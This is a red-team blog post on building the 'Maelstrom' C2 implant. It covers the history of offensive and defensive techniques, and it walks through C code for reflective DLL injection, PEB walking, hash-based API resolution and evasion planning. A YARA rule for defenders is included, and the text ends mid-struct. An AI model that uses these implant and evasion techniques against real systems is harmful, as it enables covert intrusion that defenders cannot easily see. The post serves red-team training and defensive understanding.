Maelstrom #4: Writing a C2 Implant

In this blog, we will discuss how to write a C2 implant for the modern era. We will look at the history of offensive techniques and the progress of defence.

Introduction

In the series so far, we have discussed the purpose and intentions behind a C2, and the design considerations for both the implant and server.

In this post, we will move beyond this theoretical discussion and begin building a basic implant. We'll start by looking at the evolution of offensive and defensive techniques since 2010, to give us context and understanding of the current landscape. We'll then, as with our previous posts, discuss some important concepts that we'll be incorporating into the implant. Finally, we'll walk through the implant design, writing the base of both stage0 and stage1 of the implant for our exemplar C2, Maelstrom.

When discussing C2 implants, people often say that their implant is fully undetectable (ironically, "FUD"). A newly written implant will not match any existing signature, simply because it has not been seen before. Therefore, on disk, and potentially even when run, it won't be flagged. However, this doesn't account for runtime detections, telemetry generated by Windows, or the various methods of reputation ranking used by modern endpoint detection products.

In 2022, not all companies have yet implemented all the protections that are available to them, including a full SIEM with comprehensive event logging, or even an EDR agent on every device. This can give the impression that steps like those we will discuss in this post are not required, but that is simply a result of not having yet met an environment with anything more than Defender. The days of running commands via a command interpreter are long gone:

    public void ExecuteCommand(String command)
    {
       Process p = new Process();
       ProcessStartInfo startInfo = new ProcessStartInfo();
       startInfo.FileName = "cmd.exe";
       startInfo.Arguments = @"/c " + command; // cmd.exe specific implementation
       p.StartInfo = startInfo;
       p.Start();
    }

Objectives

This post will cover:

  • The background and development of offensive and defensive techniques around implants.

  • The functions and code required for a contemporary Stage 0, including:

    • Environmental Keying

    • Detecting Suspicious Processes

    • Anti-Sandbox Protections

    • Anti-Debug Protections

  • The functions and code required for a contemporary Stage 1, including:

    • Reflective Loading

    • DLL Debugging

    • Server Checkins

    • Sleeping

From this point, we will have an implant which can manage basic checkins, and which can be augmented with more sophisticated functionality, evasive techniques, and other opsec features. We will explore these in later blogs, but for further information on evasive techniques, Check Point Research: Evasion techniques can be used as a reference.

As we've mentioned in a similar paragraph in every blog post so far, and will continue to mention in every post hereafter, the code will serve to illustrate the functionality, but is far from being immediately usable within a functional C2.

Evolution of Offensive and Defensive Techniques

Over the years, code execution has become more and more complicated as defensive techniques and processes improved, requiring more sophisticated approaches. In this section, we want to nail down the evolution and history of both offence and defence within this space. By doing so, we hope to build an understanding of why some behaviours are absolutely necessary in today's red team environment.

While some implants may be anti-virus proof, able to run without detection and execute commands within a system, this is a far cry from being able to operate as a viable C2 within a network with an up-to-date EDR and a correctly configured SIEM. Indeed, without these actions in place, a red team is unlikely to provide value to an organisation, as many of the recommendations will simply be inapplicable to a network with that level of maturity.

2010s

Back in the day when Metasploit was king, it was possible to get away with running commands from the shell. That is, the implant.exe running on the host would call cmd.exe, with the command passed via the /c flag. This would produce the following process tree:

-> implant.exe
  -> cmd.exe
    -> whoami.exe

This is all fine when no runtime rules are being evaluated against specific behaviour. Also around this time, we had one-shot-kill exploits such as MS08-067 which would essentially work as a point-and-click exploit giving NT AUTHORITY\SYSTEM access.

Obviously we cannot speak for every Anti-Virus vendor, but around this time almost all detections were performed on static analysis and required malware families to be known. This is still partially the case today with static detection; however, there is now a lot of crowdsourcing through services such as VirusTotal, and the adoption of Machine Learning, as seen in Intercept X: Powered by Deep Learning.

2014 - 2016

From the cmd.exe phase, the community moved to a very PowerShell-oriented style. This spawned projects like Empire in 2016 which was the first Command and Control (C2) Framework which was written entirely in PowerShell. Around the same time, the original PoshC2 was produced. At the time, PowerShell was working well, but the Antimalware Scan Interface (AMSI) was also gaining traction. According to This is how attackers bypass Microsoft's AMSI anti-malware scanning protection, AMSI appears to have been released in 2015. At the time, and still somewhat to this day, AMSI has been trivial to bypass. Because of this, websites such as amsi.fail were created to generate obfuscated AMSI Bypasses from the following sources:

Also, around 2016, Invoke-Obfuscation was produced to severely obfuscate PowerShell. Later, in 2016, Raphael Mudge wrote Modern Defenses and YOU!. This blog post details why operators should move away from PowerShell due to its popularity. This was reinforced by Microsoft in 2017 when they released Defending Against PowerShell Attacks and then a tweet from Matt Graeber which alludes to PowerShell being too popular and the new technique being .NET.

Whilst all this was going on, every aspect of offensive PowerShell required was built into one suite: PowerSploit.

Cobalt Strike 3.11 - The snake that eats its tail introduces execute-assembly which would dictate the next few years...

Around this time in the Defensive component of the industry, Anti-Virus vendors were migrating towards the detection and mitigation of Zero Day Exploits due to an increase in the usage of these from APTs, a portion of which were attributed to Chinese Military Groups.

Over this period of time, we saw the rise of companies such as CrowdStrike, SentinelOne, Cylance and a few others. We do not know the internals of these companies and how/when/why they started implementing their in-memory and technique based detections. But this period of time is likely where techniques such as Userland Hooking and registering Kernel Callbacks to determine suspicious behaviour emerged, followed by the introduction of languages such as Lua to write rules to parse the logs generated by such protections. Using Lua in such a way is a known use case of Microsoft Defender for Endpoint (MDE) and has been extracted by researchers, as seen in ExtractedDefender.

2017 - 2019

When Cobalt Strike introduced execute-assembly, the usage of .NET exploded and is still somewhat popular today. Projects like SharpCollection were created to build nightly releases of a bunch of tools, but this barely scratches the surface of the attack tools available throughout the internet. Around this time, Covenant was the first C2 to popularize .NET as a C2 Framework.

Likely due to this popularity, Microsoft added backwards compatibility and general support for AMSI. In What's new in .NET 4.8:

Antimalware scanning for all assemblies. In previous versions of .NET Framework, the runtime scans all assemblies loaded from disk using either Windows Defender or third-party antimalware software. However, assemblies loaded from other sources, such as by the Assembly.Load(Byte[]) method, are not scanned and can potentially contain undetected malware. Starting with .NET Framework 4.8 running on Windows 10, the runtime triggers a scan by antimalware solutions that implement the Antimalware Scan Interface (AMSI).

At the time, it received some praise online. This would be trivial to handle by heavily obfuscating the assembly, or creating .NET Loaders to encrypt and reflect the malicious tool with Assembly.Load. Dom Chell did a great talk on this in 2020: Dominic Chell - Offensive Development: Post Exploitation Tradecraft in an EDR World.

Similarly to PowerShell, SharpSploit was produced solving a huge portion of offensive requirements. An argument can be made that when a full attack suite for a given language is developed, it could be the end of an era for that language.

It was around 2019/2020 when the community began experimenting with things like Nim and the Dynamic Language Runtime (DLR) with projects such as SILENTTRINITY and OffensiveDLR.

2019 - 2020

Like execute-assembly, Cobalt Strike somewhat changed the typical tooling approach by introducing inline-execute in Cobalt Strike 4.0 – Bring Your Own Weaponization:

Finally, Cobalt Strike 4.0 introduces an internal inline-execute post-exploitation pattern. Inline-execute passes a capability to Beacon as needed, executes it inline, and cleans up the capability after it ran. This post-exploitation interface paves the way for future features that execute within Beacon’s process context without bloating the agent itself.

Along with inline-execute, Cobalt Strike introduced the idea of Beacon Object Files:

A Beacon Object File (BOF) is a compiled C program, written to a convention that allows it to execute within a Beacon process and use internal Beacon APIs. BOFs are a way to rapidly extend the Beacon agent with new post-exploitation features.

Essentially, they are just specifically crafted Common Object File Format (COFF) Files. The benefit, as TrustedSec point out in A Developer’s Introduction To Beacon Object Files, is that the operator benefits from running code inside the Beacon process itself, avoiding the creation of a child process, which is something that the in-built execute-assembly suffers from.

TrustedSec then went on to produce:

Around the same time, people began reinterpreting the execute-assembly function by rewriting the CLR and executing it as a RDLL:

With this heavy investment in rewriting key parts of Cobalt Strike, the stream of new C2s became a torrent. While custom C2 development had always been a part of the industry, Cobalt Strike's off-the-shelf nature and market dominance seemed to eclipse much of this activity. However, from 2019 onwards, more and more courses and blogs endorsed the concept of custom C2 authorship as a viable alternative to a commercial C2, or even as a straightforward learning exercise.

2022

Cobalt Strike for many years, in our experience at any rate, was the C2. Even with the growth of other C2s, Cobalt Strike remains the C2 that C2s are compared to, the Sennheiser HD600s of the offensive tools. Cobalt Strike's interface and operation (and Armitage before it) remain "what a C2 looks like", at least in our minds. Although we've not seen many imitate the device canvas (or, sadly, the lightning).

While there are arguments to be made for other projects, Cobalt Strike has been steering the industry, for both Offence and Defence, for years. The frequent and information dense blogs and videos helped both offensive and defensive teams improve their techniques in a way that few other vendors have done.

Raphael Mudge's video playlists:

Then the entire blog: Cobalt Strike: Blog

Researchers worked on "How to improve X in Cobalt Strike" for a long time, and the shift to actually building new and unique tooling has only happened over the past few years. For defensive teams, Cobalt Strike is still frequently seen and will be for a while. This comes from its leaks and cracks over the years and its continued effectiveness.

Since Raphael Mudge stepped down from the team, HelpSystems have been primarily working on stability, which has given detection a lot of time to catch up. Due to this, the detection rate for Cobalt Strike, both on disk and in memory, has drastically increased. Obviously, Cobalt Strike remains a completely viable and good option for a C2, but the industry has started to see some titans emerge to rival Cobalt Strike.

In response, in recent posts Cobalt Strike has begun to discuss working on more evasive features, such as: Arsenal Kit Update: Thread Stack Spoofing. The Cobalt Strike Roadmap Update discusses this further, mapping their future progression.

As Raphael Mudge took his foot off the gas and the research efforts slowed down, it caused the industry to begin building out their own tooling to reduce the amount of signatures that they would have to deal with. As more and more people began building these tools, the C2 Matrix began in order to track them. However, there are two titans who are at the forefront of advanced functionality:

Both of these offer advanced evasive technology baked into the product, and are aimed at working in sophisticated environments with high levels of protection in place.

Writing an entirely new C2 from scratch gives the operators full control of the implant and communications. For example, as the use of memory sweeps becomes more common, it may be a requirement to fluctuate the page permissions of the memory region out of which the implant is operating. If the operator is using Cobalt Strike, then something like ShellcodeFluctuation could be used. The issue here is that it's an extra piece of shellcode to execute, and it places a hook on the KERNEL32!Sleep function, increasing the indicators of compromise. Whereas if the C2 were completely open to the operators, this could just be a setting to enable and disable on a per-implant basis.

When it comes to modern day defences, it's a continuation of the things we've recently discussed. However, the internals of these techniques have gone through endless amounts of research and development to make them more effective. We've also seen the introduction of feeds into Event Tracing for Windows (ETW) for Threat Intelligence known as ETWTi, more on this in Introduction to Threat Intelligence ETW. As well as ingesting ETWTi feeds, more generic ETW feeds have seen use. For example, the usage of the DotNet Runtime traces to determine assemblies being loaded.

In the next two blogs, we will look at implementing a few of these techniques. Namely, ETWTi, Userland hooks, ETW, AMSI and memory sweeps.

Important Concepts

In this section, we want to outline a few topics that will come up when building out the implant so that they make sense and we can demonstrate the implant effectively.

OS Shell Commands

When discussing OS Shell Commands, we don't mean just cmd.exe. This is anything that causes a child process to spawn to run the command, and every language has its equivalent. To name a few:

We've mentioned it a few times now, but let's look at why running post exploitation under cmd.exe is a bad idea. In a more traditional environment, running commands directly on a host may be considered normal behaviour for an operator. However, as we've explored, the level of detections and awareness that an operator can expect within a contemporary environment is far higher. Advances in logging, especially within Windows, a greater awareness of which events to pay attention to, and the spread of EDR and intermediary security devices have resulted in a state of play where directly running commands is at worst immediately considered an indicator of compromise, and at best a highly suspicious activity. This can be seen by the fact it has a formal MITRE ATT&CK reference: Command and Scripting Interpreter (T1059).

While LOLBINs and aliases still have a role to play, using these for downloads and command execution is an exercise in operational security by obscurity. Techniques relying on increasingly obscure Windows built-ins can be quickly neutralised with a simple blocklist. The alternative is to avoid spawning commands altogether. This may be by reimplementing the logic within the implant, or by finding the base functions that the commands themselves use and calling them directly, bypassing any calls to run commands via cmd.exe.

Fundamentally, Windows cannot block the features that Windows itself has to use. Since these calls are so ubiquitous, with every feature in Windows making use of them, defenders are instead reliant on EDR using hooks and callbacks to monitor them.

Overall, there are more ways to reimplement and refactor code with the WinAPI than there will be to execute commands via OS-based command execution or random LOLBINs. This is something that Cobalt Strike documented: OPSEC Considerations for Beacon Commands.

WinAPI

The WinAPI is a set of functions exported from various DLLs, most of which can be seen in c:\windows\system32, and they give access to all the different components of Windows. Its utility is far too comprehensive to discuss, but here is an example. Within Kernel32.dll there's a function called VirtualAlloc:

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

For the most part, these APIs are documented on MSDN. As these functions are written by Microsoft, and marked as proprietary, projects such as ReactOS attempt to recreate them. So, when we discuss Userland Hooks and such in future blogs, we will also discuss how and why reimplementing the function, without using the function, will typically avoid specific detections.

For now, though, the WinAPI is giving us access to calls that will make this entire process easier.

Process Environment Block

Windows is an Object Oriented Operating System. Meaning, everything it operates on is an object and will have some form of data structure. Processes fall into this category. A Process, like calc.exe, has an object called the Process Environment Block (PEB) which contains all sorts of information:

  • Process Name

  • Location

  • Is it being debugged

  • Loaded modules

  • Environment Path

  • Etc

This is all stored in a structure like so:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Throughout this blog, we will interact with the PEB a lot, mainly to enumerate loaded modules and such. As this is a pretty extensive topic, we won't discuss it all. But for now, know the PEB as the structure upon which the process is built.

Position Independent Code

When we talk about Position Independent Code, we are talking about C code that is written in a very specific way, with additional restrictions. The goal is to have all the code we plan to execute inside the .text section of the PE.

Writing C normally will cause different parts of the code to be stored in different sections:

  • Global Variables in .bss

  • Imported DLLs in .idata

  • Exports in .edata

  • CHAR* and WCHAR* in .rdata

Even with all those limitations, we can still achieve our goal. We just need to write code in a very specific way to avoid these different section allocations. By doing so, we ensure all the code is in the .text section. We need this because that is the section which stores all of the executable code. If part of the code depends on .bss, then it will crash because we're only going to extract the .text.

For example, let's assume this string:

const char* String = "hello world";

Because this is read-only initialised data, it goes into .rdata. To make this PIC, the string is instead built on the stack character by character (shown here with a shorter string):

char String[] = {'a', 'b', 'c', 0};
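To make the difference concrete, here is a minimal sketch of the stack-string pattern applied to the full "hello world" string. The helper name build_greeting is hypothetical and not part of Maelstrom. The volatile qualifier is our own assumption: some compilers will otherwise fold a character-array initialiser back into a read-only constant plus a memcpy, which defeats the point, so the generated assembly should always be checked.

```c
#include <stddef.h>

/* Hypothetical helper (not from the original post): assembles a string on the
 * stack and copies it into `out`. Returns the string length, or 0 on failure. */
static size_t build_greeting(char *out, size_t cap)
{
    /* Character-by-character initialiser instead of a string literal.
     * volatile discourages the compiler from turning this into a copy
     * from a read-only data section. */
    volatile char text[] = {'h','e','l','l','o',' ','w','o','r','l','d','\0'};
    size_t i;

    if (out == NULL || cap < sizeof(text))
        return 0;

    /* Manual copy loop, so there is no dependency on memcpy or strcpy. */
    for (i = 0; i < sizeof(text); i++)
        out[i] = text[i];

    return sizeof(text) - 1; /* length without the terminator */
}
```

The caller supplies the buffer, so the helper itself references nothing outside its own stack frame and arguments.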

What if we want to use VirtualAlloc? If it's just called as is, then it will have Kernel32 as an import. To get around this, we will need to dynamically load the DLL, and then resolve the address (more on this later).

One final note, to ensure we don't have CRT controlling the execution flow of the PE, we need to make sure that the entry-point is not main or some other form of winmain, wmain, etc. We will show this later on in the Makefile.

For more on this, we recommend: PE Reflection: The King is Dead, Long Live the King.

Supporting Post Exploitation

When discussing implants, there are several methods of supporting post exploitation utilities. For the most part, implants will have a majority of their functionality embedded in the implant. So, when the implant receives a command, the command will go through some sort of switch statement:

switch (job) {
    case 1:
        whoami();
        break;
    case 2:
        hostname();
        break;
}

Alternatively, the implant could work as a loader; supporting:

This ensures that the actual implant is significantly smaller, and all functionality is modular. However, this comes at the cost of constant memory allocations for each job. The method chosen is entirely dependent on the use case, but it is a trade-off that should be considered. For us, we will stick to the traditional variant with all functionality embedded.

Types of implants

If the implant is to be .NET, then a simple assembly that's dynamically loaded is fine. However, this is not the type of implant we are discussing. For an implant written in C(++) there are some options on the type of implant to use.

Position Independent

The implant could well be Position Independent, with the entry point resolved at runtime. This is seen in SleepyCrypt, where the functionality is allocated with VirtualAlloc and cast to a function, like so:

// Copy the shellcode into it.
memcpy( pBuffer, shellcode_bin, shellcode_bin_len );

// Make a function pointer to the run function shellcode.
fprun Run = ( fprun )pBuffer;

Dynamic Link Library

More commonly, the implant could be written as a Dynamic Link Library (DLL). DLLs are typically loaded with LoadLibraryA:

HMODULE hModule = LoadLibraryA("c:\\implant.dll");

The issue here is that LoadLibraryA requires the DLL to be on disk, which would break the golden rule of OpSec: Don't write to disk. Doing so will leave artifacts behind, allowing the implant to be signatured, resulting in more time spent trying to break the signature.

The Golden Rule of OpSec: Don't write to disk!*

* Unless you need to, or unless you know how to avoid the detection, or... except... and... ... other caveats

Reflective DLLs

This led to a technique known as Reflective DLLs (RDLL), first produced by Stephen Fewer around 11 years ago. The ReflectiveDLLInjection repository contains the original code. Since then, the technique has been updated, but let's discuss the original. The description:

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Essentially what's going to happen is the RDLL will be allocated similarly to typical shellcode:

However, before the thread is created, the Relative Virtual Address (RVA) is calculated by parsing the PE headers of the buffer for the Export Directory, and then walking all the exports to identify the RDLL's export (which is simply a function exposed from the DLL).

See also: The .edata Section, more on the PEB structure later.

Once the exported address has been found, the offset is added to the base address of the allocated space for the RDLL. Like so:

LPVOID lpBuffer = NULL /* This will be the buffer containing the RDLL */;
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );

  • First off, lpBuffer can be from anywhere; downloaded from the internet, read from a file, etc. For an implant, it's likely downloaded over some sort of channel (HTTP).

  • With the buffer, it is then cycled through to find the RVA of the exported function.

  • Now that the offset is determined, and stored in dwReflectiveLoaderOffset, lpRemoteLibraryBuffer will be the base address returned from VirtualAllocEx.

  • With the space allocated and the export offset found, the two can be added together to get the address of the exported function.

All that needs to happen now is for the thread to be created at this point to execute the loader:

hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );

All of this can be seen in LoadRemoteLibraryR from the repository.

The exported function can be seen in the DLLEXPORT of ReflectiveLoader; this is the function the thread triggers on. The code is well documented, so we will not discuss the codebase.

There are some issues with RDLLs, and we will discuss them in a future post in which we perform a static/runtime analysis of the implant. For defenders, make sure there is a signature for this technique and ensure the ReflectiveLoader string is treated as malicious, as seen on alienvault.com:

import "pe"
rule ReflectiveLoader
{
    meta:
        description = "Detects a unspecified hack tool, crack or malware using a reflective loader  no hard match  further investigation recommended"
        reference = "Internal Research"
        score = 60
    strings:
        $s1 = "ReflectiveLoader" fullword ascii
        $s2 = "ReflectivLoader.dll" fullword ascii
        $s3 = "?ReflectiveLoader@@" ascii
    condition:
    uint16(0) == 0x5a4d and ( 1 of them or pe.exports("ReflectiveLoader") or pe.exports("_ReflectiveLoader@4") or pe.exports("?ReflectiveLoader@@YGKPAX@Z") )
}

This is the technique we will follow for Maelstrom.

Recap of the Execution Flow

During Maelstrom: The C2 Architecture we discussed the execution flow that the implant will take:

  • Stage 0: A Position Independent Loader

  • Stage 1: Reflective DLL

By making the stage 0 loader PIC, we can wrap it into any other form of loader required. Once the Stage 0 executes, it will load a Reflective DLL which will be the main implant (Stage 1).

Simple.

Stage 0

Maelstrom WinAPI Resolution

Before getting into the stager, we need to cover how Maelstrom resolves WinAPI functions. In order to keep our actual C2's functionality somewhat guarded, we're opting to use publicly accessible code throughout this series. One solution is paranoidninja/PIC-Get-Privileges/blob/main/addresshunter.h, and an alternative could be: Speedi13/Custom-GetProcAddress-and-GetModuleHandle-and-more/blob/master/CustomWinApi.cpp#L168.

Parsing the PEB is not a difficult task, and it is all over the internet. CAPA even has rules for this. The function from Paranoid Ninja's example:

FARPROC GetSymbolAddress(HANDLE hModule, LPCSTR lpProcName) {
    UINT64 uiModuleAddress = (UINT64)hModule;
    UINT64 uiSymbolAddress = 0;
    UINT64 uiExportedAddressTable = 0;
    UINT64 uiNamePointerTable = 0;
    UINT64 uiOrdinalTable = 0;

    if (hModule == NULL) {
        return 0;
    }

    PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
    PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

    uiExportedAddressTable = (uiModuleAddress + ExportDir->AddressOfFunctions);
    uiNamePointerTable = (uiModuleAddress + ExportDir->AddressOfNames);
    uiOrdinalTable = (uiModuleAddress + ExportDir->AddressOfNameOrdinals);

    if (((UINT64)lpProcName & 0xFFFF0000) == 0x00000000) {
        uiExportedAddressTable += ((IMAGE_ORDINAL((UINT64)lpProcName) - ExportDir->Base) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
    }
    else {
        DWORD dwCounter = ExportDir->NumberOfNames;
        while (dwCounter--) {
            char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
            if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
                uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
                uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
                break;
            }
            uiNamePointerTable += sizeof(DWORD);
            uiOrdinalTable += sizeof(WORD);
        }
    }

    return (FARPROC)uiSymbolAddress;
}

First, pass in a module base address and cast it to uiModuleAddress:

UINT64 uiModuleAddress = (UINT64)hModule;

This is then used to identify the Export Directory. Again, this is a standard technique:

PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)(uiModuleAddress + ((PIMAGE_DOS_HEADER)uiModuleAddress)->e_lfanew);
PIMAGE_DATA_DIRECTORY DataDir = (PIMAGE_DATA_DIRECTORY)&NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
PIMAGE_EXPORT_DIRECTORY ExportDir = (PIMAGE_EXPORT_DIRECTORY)(uiModuleAddress + DataDir->VirtualAddress);

Locate the NT Headers by adding the e_lfanew field of the DOS Header to the module base address. Then, from the NT Headers, take the Export entry of the Data Directory array. Finally, get the Export Directory itself by offsetting the module base with that data directory's virtual address. Access to the Export Directory has now been achieved.

Now it is just a case of looping through all the exported functions from that directory until the strings match:

DWORD dwCounter = ExportDir->NumberOfNames;
while (dwCounter--) {
    char* cpExportedFunctionName = (char*)(uiModuleAddress + DEREF_32(uiNamePointerTable));
    if (Strcmp(cpExportedFunctionName, lpProcName) == 0) {
        uiExportedAddressTable += (DEREF_16(uiOrdinalTable) * sizeof(DWORD));
        uiSymbolAddress = (UINT64)(uiModuleAddress + DEREF_32(uiExportedAddressTable));
        break;
    }
    uiNamePointerTable += sizeof(DWORD);
    uiOrdinalTable += sizeof(WORD);
}

As strcmp cannot be used without resolving it, it's easier to just take the source code (a memset replacement is shown alongside it):

int STRCMP(const char* p1, const char* p2)
{
    const unsigned char* s1 = (const unsigned char*)p1;
    const unsigned char* s2 = (const unsigned char*)p2;
    unsigned char c1, c2;
    do
    {
        c1 = (unsigned char)*s1++;
        c2 = (unsigned char)*s2++;
        if (c1 == '\0')
            return c1 - c2;
    } while (c1 == c2);
    return c1 - c2;
}

void* MEMSET2(void* dest, int val, size_t len)
{
    unsigned char* ptr = dest;
    while (len-- > 0)
        *ptr++ = val;
    return dest;
}

When STRCMP matches, we return the symbolAddress after the break:

return (FARPROC)uiSymbolAddress;

So where is the module base address coming from? Well:

LPVOID GetKernel32() {
    LPVOID pKernel32Dll = NULL;
    pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH1);
    if (NULL == pKernel32Dll) {
        pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH2);
        if (NULL == pKernel32Dll) {
            pKernel32Dll = GetModuleByHash(KERNEL32DLL_HASH3);
            if (NULL == pKernel32Dll) {
                return NULL;
            }
        }
    }
    return pKernel32Dll;
}

Three DJB2 hashes are defined:

#define KERNEL32DLL_HASH1   0xa709e74f /// Hash of KERNEL32.DLL
#define KERNEL32DLL_HASH2   0xa96f406f /// Hash of kernel32.dll
#define KERNEL32DLL_HASH3   0x8b03944f /// Hash of Kernel32.dll
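Three hashes are presumably defined because the hash is case sensitive and the module name can show up in any of those casings. The implementation of Djb2HashW is not shown in this post, so the following is only a sketch of a textbook DJB2 over wide strings, assuming a seed of 5381 and a multiplier of 33. The function names are ours, and we have not checked that it reproduces the constants above. The second function shows one possible alternative to keeping three constants: fold ASCII letters to lower case before hashing.

```c
#include <assert.h>
#include <stdint.h>
#include <wchar.h>

/* Textbook DJB2: start at 5381, then hash = hash * 33 + c per character.
 * Assumption: Maelstrom's Djb2HashW may differ in seed, width, or folding. */
static uint32_t djb2_hash_w(const wchar_t *s)
{
    assert(s != NULL);
    uint32_t hash = 5381;
    while (*s != L'\0') {
        hash = (hash << 5) + hash + (uint32_t)*s++;
    }
    return hash;
}

/* Variant that folds ASCII A-Z to lower case first, so a single constant
 * matches KERNEL32.DLL, kernel32.dll, and Kernel32.dll alike. */
static uint32_t djb2_hash_w_nocase(const wchar_t *s)
{
    assert(s != NULL);
    uint32_t hash = 5381;
    for (; *s != L'\0'; s++) {
        wchar_t c = *s;
        if (c >= L'A' && c <= L'Z') {
            c = (wchar_t)(c - L'A' + L'a');
        }
        hash = (hash << 5) + hash + (uint32_t)c;
    }
    return hash;
}
```

The trade-off is that a case-folded hash has to be matched by a case-folded constant at build time, so whatever script generates the #define values must apply the same folding.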

Then, parsing the PEB we can obtain the DLLBase:

LPVOID GetModuleByHash(UINT uiModuleHash) {
    PEB* peb = (PEB*)PPEB_PTR;
    if (NULL == peb) {
        return NULL;
    }

    PEB_LDR_DATA* pLdr = peb->Ldr;
    LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
    LIST_ENTRY* pListEntry = NULL;
    LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

    for (pListEntry = pListHead->Flink; pListEntry != pListHead; pListEntry = pListEntry->Flink) {
        pLdrEntry = (LDR_DATA_TABLE_ENTRY_COMPLETED*)((PCHAR)pListEntry - sizeof(LIST_ENTRY));
        WCHAR* pwDllName = pLdrEntry->BaseDllName.Buffer;
        UINT wHash = Djb2HashW(pwDllName);
        if (wHash == uiModuleHash) {
            return pLdrEntry->DllBase;
        }
    }
    return NULL;
}

First off, get the PEB Struct:

PEB* peb = (PEB*)PPEB_PTR;

Where PPEB_PTR is:

#define PPEB_PTR __readgsqword(0x60)

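On x64, the GS segment register points at the TEB, and the pointer to the PEB sits at offset 0x60, so reading a qword from gs:[0x60] gives access to the PEB. Next, we can get the PEB_LDR_DATA struct by simply accessing it: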

PEB_LDR_DATA* pLdr = peb->Ldr;

Then get access to the module list:

LIST_ENTRY* pListHead = &(pLdr->InMemoryOrderModuleList);
LIST_ENTRY* pListEntry = NULL;
LDR_DATA_TABLE_ENTRY_COMPLETED* pLdrEntry;

As seen in the struct:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

Then loop over the list until the hashes match. When they do, that entry is the required DLL.
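The pointer arithmetic in the loop, (PCHAR)pListEntry - sizeof(LIST_ENTRY), works because InMemoryOrderModuleList is threaded through the second LIST_ENTRY of each loader entry, directly after InLoadOrderLinks. The following portable sketch shows the same idea with hypothetical Link and Entry types of our own. It uses offsetof rather than a hard-coded sizeof so that the intent is explicit:

```c
#include <assert.h>
#include <stddef.h>

/* Minimal doubly linked list node, shaped like the Windows LIST_ENTRY. */
typedef struct Link {
    struct Link *Flink;
    struct Link *Blink;
} Link;

/* Hypothetical entry with two embedded links, mirroring how a loader entry
 * begins with InLoadOrderLinks followed by InMemoryOrderLinks. */
typedef struct Entry {
    Link        LoadOrder;   /* offset 0            */
    Link        MemoryOrder; /* offset sizeof(Link) */
    const char *Name;
} Entry;

/* Recover the Entry that owns a given MemoryOrder link. */
static Entry *entry_from_memory_link(Link *link)
{
    assert(link != NULL);
    return (Entry *)((char *)link - offsetof(Entry, MemoryOrder));
}

/* Walk a circular list threaded through MemoryOrder and count its entries.
 * The head is a bare Link, not an Entry, so it is never converted. */
static size_t count_entries(Link *head)
{
    assert(head != NULL);
    size_t n = 0;
    for (Link *p = head->Flink; p != head; p = p->Flink) {
        n++;
    }
    return n;
}
```

The list head lives in PEB_LDR_DATA and is not itself part of an entry, which is why the loop in GetModuleByHash stops when it gets back to pListHead instead of converting it.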

Now it's a case of casting to the function type. Before that, here is how the APIs are stored:

typedef struct API_ {
    LPVOID LoadLibraryA;
    LPVOID CloseHandle;
    LPVOID GlobalMemoryStatusEx;
    LPVOID CreateToolhelp32Snapshot;
    LPVOID Process32NextW;
    LPVOID Process32FirstW;
    LPVOID GetComputerNameW;
    LPVOID Sleep;
    LPVOID WinHttpCloseHandle;
    LPVOID WinHttpQueryDataAvailable;
    LPVOID WinHttpQueryHeaders;
    LPVOID WinHttpReadData;
    LPVOID WinHttpReceiveResponse;
    LPVOID WinHttpSendRequest;
    LPVOID WinHttpSetOption;
    LPVOID WinHttpConnect;
    LPVOID WinHttpOpen;
    LPVOID WinHttpOpenRequest;
    LPVOID WinHttpAddRequestHeaders;
    LPVOID GlobalFree;
    LPVOID malloc;
    LPVOID free;
    LPVOID memset;
